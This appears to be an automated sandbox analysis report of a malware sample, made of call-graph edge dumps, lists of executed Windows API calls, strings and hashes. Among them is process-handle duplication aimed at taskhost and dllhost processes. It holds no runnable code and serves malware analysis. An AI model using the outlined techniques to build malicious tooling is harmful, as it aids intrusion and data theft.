40164->39998 40165->39990 40166->39996 40167->40000 40168->40009 40169->40013 40170->39983 40171->39989 40172->39997 40173->40001 40174->40008 40175->40012 40176->40018 40177->40013 40178->40021 40179->40023 40180->40033 40181->39974 40182->39920 40184 42a175 40183->40184 40186 42a122 40183->40186 40184->40098 40189 42b13b 148 API calls 40184->40189 40186->40184 40187 42a115 148 API calls 40186->40187 40190 43a174 40186->40190 40214 42a0a8 148 API calls 40186->40214 40187->40186 40189->40100 40204 43a196 40190->40204 40205 43a19e 40190->40205 40191 43a306 40191->40204 40234 4388c4 14 API calls 40191->40234 40194 42a115 148 API calls 40194->40205 40196 43a642 40196->40204 40238 4169a7 11 API calls 40196->40238 40200 43a635 40237 42c02e memset 40200->40237 40204->40186 40205->40191 40205->40194 40205->40204 40215 42ff8c 40205->40215 40223 415a91 40205->40223 40227 4165ff 40205->40227 40230 439504 13 API calls 40205->40230 40231 4312d0 148 API calls 40205->40231 40232 42be4c memcpy memcpy memcpy memset memcpy 40205->40232 40233 43a121 11 API calls 40205->40233 40206 43a325 40206->40196 40206->40200 40206->40204 40208 42bf4c 14 API calls 40206->40208 40209 4169a7 11 API calls 40206->40209 40210 42b5b5 memset memcpy 40206->40210 40213 4165ff 11 API calls 40206->40213 40235 42b63e 14 API calls 40206->40235 40236 42bfcf memcpy 40206->40236 40208->40206 40209->40206 40210->40206 40213->40206 40214->40186 40239 43817e 40215->40239 40217 42ff9d 40217->40205 40218 42ff99 40218->40217 40219 42ffe3 40218->40219 40220 42ffd0 40218->40220 40244 4169a7 11 API calls 40219->40244 40243 4169a7 11 API calls 40220->40243 40224 415a9d 40223->40224 40225 415ab3 40224->40225 40226 415aa4 memset 40224->40226 40225->40205 40226->40225 40390 4165a0 40227->40390 40230->40205 40231->40205 40232->40205 40233->40205 40234->40206 40235->40206 40236->40206 40237->40196 40238->40204 40240 438187 40239->40240 40241 438192 40239->40241 40245 4380f6 40240->40245 40241->40218 40243->40217 40244->40217 40247 43811f 40245->40247 40246 438164 40246->40241 40247->40246 40249 4300e8 3 API calls 40247->40249 40250 437e5e 40247->40250 40249->40247 40273 437d3c 40250->40273 40252 437eb3 40252->40247 40253 437ea9 40253->40252 40258 437f22 40253->40258 40288 41f432 40253->40288 40256 437f06 40336 415c56 11 API calls 40256->40336 40260 437f7f 40258->40260 40261 432d4e 3 API calls 40258->40261 40259 437f95 40337 415c56 11 API calls 40259->40337 40260->40259 40263 43802b 40260->40263 40261->40260 40264 4165ff 11 API calls 40263->40264 40265 438054 40264->40265 40299 437371 40265->40299 40268 43806b 40269 438094 40268->40269 40338 42f50e 139 API calls 40268->40338 40271 437fa3 40269->40271 40272 4300e8 3 API calls 40269->40272 40271->40252 40339 41f638 104 API calls 40271->40339 40272->40271 40274 437d69 40273->40274 40277 437d80 40273->40277 40340 437ccb 11 API calls 40274->40340 40276 437d76 40276->40253 40277->40276 40278 437da3 40277->40278 40280 437d90 40277->40280 40281 438460 134 API calls 40278->40281 40280->40276 40344 437ccb 11 API calls 40280->40344 40284 437dcb 40281->40284 40282 437de8 40343 424f26 123 API calls 40282->40343 40284->40282 40341 444283 13 API calls 40284->40341 40286 437dfc 40342 437ccb 11 API calls 40286->40342 40289 41f54d 40288->40289 40295 41f44f 40288->40295 40290 41f466 40289->40290 40374 41c635 memset memset 40289->40374 40290->40256 40290->40258 40295->40290 40297 41f50b 40295->40297 40345 41f1a5 40295->40345 40370 41c06f memcmp 40295->40370 40371 41f3b1 90 API calls 40295->40371 40372 41f398 86 API calls 40295->40372 40297->40289 40297->40290 40373 41c295 86 API calls 40297->40373 40375 41703f 40299->40375 40301 437399 40302 43739d 40301->40302 40305 4373ac 40301->40305 40383 4446ea 11 API calls 40302->40383 40304 4373a7 40304->40268 40306 416935 16 API calls 40305->40306 40307 4373ca 40306->40307 40308 438460 134 API calls 40307->40308 40313 4251c4 137 API calls 40307->40313 40317 415a91 memset 40307->40317 40319 425413 17 API calls 40307->40319 40320 43758f 40307->40320 40324 42533e 16 API calls 40307->40324 40331 42538f 16 API calls 40307->40331 40332 437584 40307->40332 40335 437d3c 135 API calls 40307->40335 40382 415304 ??3@YAXPAX 40307->40382 40384 425433 13 API calls 40307->40384 40385 42453e 123 API calls 40307->40385 40308->40307 40309 4375bc 40311 415c7d 16 API calls 40309->40311 40312 4375d2 40311->40312 40312->40304 40314 4442e6 11 API calls 40312->40314 40313->40307 40315 4375e2 40314->40315 40315->40304 40388 444283 13 API calls 40315->40388 40317->40307 40319->40307 40386 42453e 123 API calls 40320->40386 40323 4375f4 40326 437620 40323->40326 40327 43760b 40323->40327 40324->40307 40325 43759f 40328 416935 16 API calls 40325->40328 40330 416935 16 API calls 40326->40330 40389 444283 13 API calls 40327->40389 40328->40332 40330->40304 40331->40307 40332->40309 40387 42453e 123 API calls 40332->40387 40333 437612 memcpy 40333->40304 40335->40307 40336->40252 40337->40271 40338->40269 40339->40252 40340->40276 40341->40286 40342->40282 40343->40276 40344->40276 40346 41bc3b 101 API calls 40345->40346 40347 41f1b4 40346->40347 40348 41edad 86 API calls 40347->40348 40355 41f282 40347->40355 40349 41f1cb 40348->40349 40350 41f1f5 memcmp 40349->40350 40351 41f20e 40349->40351 40349->40355 40350->40351 40352 41f21b memcmp 40351->40352 40351->40355 40353 41f326 40352->40353 40356 41f23d 40352->40356 40354 41ee6b 86 API calls 40353->40354 40353->40355 40354->40355 40355->40295 40356->40353 40357 41f28e memcmp 40356->40357 40359 41c8df 56 API calls 40356->40359 40357->40353 40358 41f2a9 40357->40358 40358->40353 40361 41f308 40358->40361 40362 41f2d8 40358->40362 40360 41f269 40359->40360 40360->40353 40363 41f287 40360->40363 40364 41f27a 40360->40364 40361->40353 40368 4446ce 11 API calls 40361->40368 40365 41ee6b 86 API calls 40362->40365 40363->40357 40366 41ee6b 86 API calls 40364->40366 40367 41f2e0 40365->40367 40366->40355 40369 41b1ca memset 40367->40369 40368->40353 40369->40355 40370->40295 40371->40295 40372->40295 40373->40289 40374->40290 40376 417044 40375->40376 40377 41705c 40375->40377 40379 416760 11 API calls 40376->40379 40381 417055 40376->40381 40378 417075 40377->40378 40380 41707a 11 API calls 40377->40380 40378->40301 40379->40381 40380->40376 40381->40301 40382->40307 40383->40304 40384->40307 40385->40307 40386->40325 40387->40309 40388->40323 40389->40333 40395 415cfe 40390->40395 40400 415d23 40395->40400 40402 41628e 40395->40402 40396 4163ca 40409 416422 11 API calls 40396->40409 40398 416422 10 API calls 40398->40400 40399 416172 memset 40399->40400 40400->40396 40400->40398 40400->40399 40401 415cb9 10 API calls 40400->40401 40400->40402 40401->40400 40403 416520 40402->40403 40404 416527 40403->40404 40408 416574 40403->40408 40406 416544 40404->40406 40404->40408 40410 4156aa 11 API calls 40404->40410 40407 416561 memcpy 40406->40407 40406->40408 40407->40408 40408->40205 40409->40402 40410->40406 40431 41493c EnumResourceNamesW 37676 4287c1 37677 4287d2 37676->37677 37678 429ac1 37676->37678 37679 428818 37677->37679 37680 42881f 37677->37680 37701 425711 37677->37701 37690 425ad6 37678->37690 37746 415c56 11 API calls 37678->37746 37713 42013a 37679->37713 37741 420244 97 API calls 37680->37741 37685 4260dd 37740 424251 120 API calls 37685->37740 37687 4259da 37739 416760 11 API calls 37687->37739 37693 422aeb memset memcpy memcpy 37693->37701 37694 429a4d 37695 429a66 37694->37695 37699 429a9b 37694->37699 37742 415c56 11 API calls 37695->37742 37697 4260a1 37738 415c56 11 API calls 37697->37738 37700 429a96 37699->37700 37744 416760 11 API calls 37699->37744 37745 424251 120 API calls 37700->37745 37701->37678 37701->37687 37701->37693 37701->37694 37701->37697 37709 4259c2 37701->37709 37712 425a38 37701->37712 37729 4227f0 memset memcpy 37701->37729 37730 422b84 15 API calls 37701->37730 37731 422b5d memset memcpy memcpy 37701->37731 37732 422640 13 API calls 37701->37732 37734 4241fc 11 API calls 37701->37734 37735 42413a 90 API calls 37701->37735 37704 429a7a 37743 416760 11 API calls 37704->37743 37709->37690 37733 415c56 11 API calls 37709->37733 37712->37709 37736 422640 13 API calls 37712->37736 37737 4226e0 12 API calls 37712->37737 37714 42014c 37713->37714 37717 420151 37713->37717 37756 41e466 97 API calls 37714->37756 37716 420162 37716->37701 37717->37716 37718 4201b3 37717->37718 37719 420229 37717->37719 37720 4201b8 37718->37720 37721 4201dc 37718->37721 37719->37716 37722 41fd5e 86 API calls 37719->37722 37747 41fbdb 37720->37747 37721->37716 37725 4201ff 37721->37725 37753 41fc4c 37721->37753 37722->37716 37725->37716 37728 42013a 97 API calls 37725->37728 37728->37716 37729->37701 37730->37701 37731->37701 37732->37701 37733->37687 37734->37701 37735->37701 37736->37712 37737->37712 37738->37687 37739->37685 37740->37690 37741->37701 37742->37704 37743->37700 37744->37700 37745->37678 37746->37687 37748 41fbf8 37747->37748 37751 41fbf1 37747->37751 37761 41ee26 37748->37761 37752 41fc39 37751->37752 37771 4446ce 11 API calls 37751->37771 37752->37716 37757 41fd5e 37752->37757 37754 41ee6b 86 API calls 37753->37754 37755 41fc5d 37754->37755 37755->37721 37756->37717 37759 41fd65 37757->37759 37758 41fdab 37758->37716 37759->37758 37760 41fbdb 86 API calls 37759->37760 37760->37759 37762 41ee41 37761->37762 37763 41ee32 37761->37763 37772 41edad 37762->37772 37775 4446ce 11 API calls 37763->37775 37766 41ee3c 37766->37751 37769 41ee58 37769->37766 37777 41ee6b 37769->37777 37771->37752 37781 41be52 37772->37781 37775->37766 37776 41eb85 11 API calls 37776->37769 37778 41ee70 37777->37778 37779 41ee78 37777->37779 37837 41bf99 86 API calls 37778->37837 37779->37766 37782 41be6f 37781->37782 37783 41be5f 37781->37783 37789 41be8c 37782->37789 37802 418c63 37782->37802 37816 4446ce 11 API calls 37783->37816 37786 41be69 37786->37766 37786->37776 37787 41bee7 37787->37786 37820 41a453 86 API calls 37787->37820 37789->37786 37789->37787 37790 41bf3a 37789->37790 37793 41bed1 37789->37793 37819 4446ce 11 API calls 37790->37819 37792 41bef0 37792->37787 37794 41bf01 37792->37794 37793->37792 37796 41bee2 37793->37796 37795 41bf24 memset 37794->37795 37797 41bf14 37794->37797 37817 418a6d memset memcpy memset 37794->37817 37795->37786 37806 41ac13 37796->37806 37818 41a223 memset memcpy memset 37797->37818 37801 41bf20 37801->37795 37805 418c72 37802->37805 37803 418c94 37803->37789 37804 418d51 memset memset 37804->37803 37805->37803 37805->37804 37807 41ac52 37806->37807 37808 41ac3f memset 37806->37808 37811 41ac6a 37807->37811 37821 41dc14 19 API calls 37807->37821 37809 41acd9 37808->37809 37809->37787 37813 41aca1 37811->37813 37822 41519d 37811->37822 37813->37809 37814 41acc0 memset 37813->37814 37815 41accd memcpy 37813->37815 37814->37809 37815->37809 37816->37786 37817->37797 37818->37801 37819->37787 37821->37811 37825 4175ed 37822->37825 37833 417570 SetFilePointer 37825->37833 37828 41760a ReadFile 37830 417637 37828->37830 37831 417627 GetLastError 37828->37831 37829 4151b3 37829->37813 37830->37829 37832 41763e memset 37830->37832 37831->37829 37832->37829 37834 4175b2 37833->37834 37835 41759c GetLastError 37833->37835 37834->37828 37834->37829 37835->37834 37836 4175a8 GetLastError 37835->37836 37836->37834 37837->37779 37838 417bc5 37840 417c61 37838->37840 37843 417bda 37838->37843 37839 417bf6 UnmapViewOfFile CloseHandle 37839->37839 37839->37843 37842 417c2c 37842->37843 37850 41851e 20 API calls 37842->37850 37843->37839 37843->37840 37843->37842 37845 4175b7 37843->37845 37846 4175d6 FindCloseChangeNotification 37845->37846 37847 4175c8 37846->37847 37848 4175df 37846->37848 37847->37848 37849 4175ce Sleep 37847->37849 37848->37843 37849->37846 37850->37842 39884 4147f3 39887 414561 39884->39887 39886 414813 39888 41456d 39887->39888 39889 41457f GetPrivateProfileIntW 39887->39889 39892 4143f1 memset _itow WritePrivateProfileStringW 39888->39892 39889->39886 39891 41457a 39891->39886 39892->39891

                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                          Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                          • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                                          • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                                                                                                                                                                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                                          • API String ID: 594330280-3398334509
                                                                                                                                                                                                          • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 651 413e79-413e9d call 413959 call 413ca4 643->651 652 413e28-413e35 643->652 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 ??3@YAXPAX@Z 644->647 649 413edb-413ee2 646->649 647->649 657 413ee4 649->657 658 413ee7-413efe 649->658 663 413ea2-413eae CloseHandle 651->663 655 413e61-413e68 652->655 656 413e37-413e44 GetModuleHandleW 652->656 655->651 659 413e6a-413e76 655->659 656->655 661 413e46-413e5c GetProcAddress 656->661 657->658 658->639 659->651 661->655 663->642
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                                                                                          • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                                          • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                                                                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                                          • API String ID: 912665193-1740548384
                                                                                                                                                                                                          • Opcode ID: bad4dea3beb0439734bc0ac1abfc8871ebdfa8b569daaedc40f19ab4abd0eaad
                                                                                                                                                                                                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bad4dea3beb0439734bc0ac1abfc8871ebdfa8b569daaedc40f19ab4abd0eaad
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                                          • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040B60D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                                          • String ID: BIN
                                                                                                                                                                                                          • API String ID: 1668488027-1015027815
                                                                                                                                                                                                          • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                          • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406E8F Relevance: 3.4, APIs: 2, Instructions: 415COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                                                          • memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00407082
                                                                                                                                                                                                            • Part of subcall function 004069DF: memcpy.MSVCRT ref: 004069FB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@$memcpymemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2420179184-0
                                                                                                                                                                                                          • Opcode ID: 918725139429929a89f1f48b88d6c4cc4d3c3d390f69a75811133ef8db7b8cf4
                                                                                                                                                                                                          • Instruction ID: 420730b51c6485b03e68e59ad930d3fea23228fdda059c903cb8609e0c2e012e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 918725139429929a89f1f48b88d6c4cc4d3c3d390f69a75811133ef8db7b8cf4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54027D71D042299BDF24DF65C8846EEB7B1BF48314F1481BAE849BB381D738AE81CB55
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFind$FirstNext
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1690352074-0
                                                                                                                                                                                                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                          • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InfoSystemmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3558857096-0
                                                                                                                                                                                                          • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
